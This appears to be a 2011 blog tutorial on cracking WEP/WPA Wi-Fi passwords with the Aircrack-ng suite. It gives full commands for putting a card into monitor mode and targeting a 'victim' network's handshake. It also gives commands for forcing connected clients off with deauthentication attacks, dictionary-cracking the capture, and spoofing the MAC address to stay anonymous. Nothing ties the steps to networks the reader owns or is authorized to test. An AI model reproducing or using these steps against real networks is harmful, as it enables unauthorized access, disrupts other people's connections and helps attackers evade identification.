Thursday 21 April 2011

How To Hack WEP/WPA With Linux

Background

I noticed a strange behaviour. A lot of people were into cracking WEP, but still had a lot of questions on WPA. After these findings, I decided to just write my own tutorial :-)
Knowledge
If you look at the attacks closely, you'd think WPA was very easy to crack. Well, some people say it is, some don't agree. The fact is, that if the password is in some sort of dictionary, the password can be cracked. you'll need a 4-way handshake from a client connecting to an AP. The 4way handshake holds an encrypted algorithm which can be cracked by dictionary attack. you'll need a huge list and some luck that the password is in the list, or you can make a personal list created with a password tool of your choice (like john), which will not be discussed in this tutorial ;-).For this tutorial, of course I'll be using the Aircrack-ng suite.
Optional: lazyness

sudo su
you might need root access to run these applications. For example, if you are using Ubuntu and you don't want to type "sudo" in front of every line, you could use this optional command.
knowing what interface to use
first of all, you'll have to know what the name of your wireless interface is, thats why you type:
iwconfig
iwconfig Identifying your victim

airmon-ng start interface
you'd get a small message saying: (monitor mode enabled on [i]spoofedinterface[/i] ) //In my case, interface was "mon0"..
airodump-ng spoofedinterface
The next step would be choosing your victim. Obviously we would be looking for someone with wpa encryption now. since you want to crack someone with wpa. write down his BSSID and his CHANNEL.
airodump rebooting the network card to fit in the right Channel

airmon-ng stop spoofedinterfacew
airmon-ng start interface CHANNEL
Start the dumping of the file

airodump-ng -c CHANNEL --bssid BSSID -w psk spoofedinterface
this will start airodump-ng on your specific channel (-c). It will search handshakes of the specifief bssid and will write this all to a capture file named psk (-w).
Notice! You might ask yourself, but how do I know when I captured a handshake? -> Well, aircrack thought of that, if you managed to capture a handshake, a message appears in the upper right corner.
handshake Optional!, but very helpful when speeding up the process
So you need to capture a handshake, but the people who are connected of course won't be giving out the handshake, since this event only takes place during authentication. If we could just boot them for a small second off their network, so they could reconnect, that would be perfect!
aireplay-ng -0 10 -a BSSID -c CLIENTBSSID spoofed interface
This would do 10 "deauthentication" attacks (-0) with the AP being BSSID and client being booted CLIENTBSSID. You can check if a client is connected by looking at your Airodump-ng screen again. If you see on the bottom of that screen that someone is connected to the ESSID of your victim, simply use the STATION BSSID as CLIENTBSSID in this example.
aircrack-ng -w /pentest/wordlist.lst -b BSSID psk*.cap
This would crack the actual capture file that was being created by airodump-ng. notice! You can only try to crack when a handshake actually took place. Don't forget, -w needs the path to your wordlist, so remember where you saved it!
ac-ng Optional security
As a scriptkiddy, you might want to remain a bit anonymous, so here's how you would change your mac.. Try to implement it yourself ;-)
sudo ifconfig spoofedinterface down && sudo macchanger -r interface && sudo macchanger -r spoofedinterface && ifconfig spoofedinterface up
Wordlists
If you ever needed some good wordlists, I suggest checking here first: wordlists
Qkyrie

No comments:

Post a Comment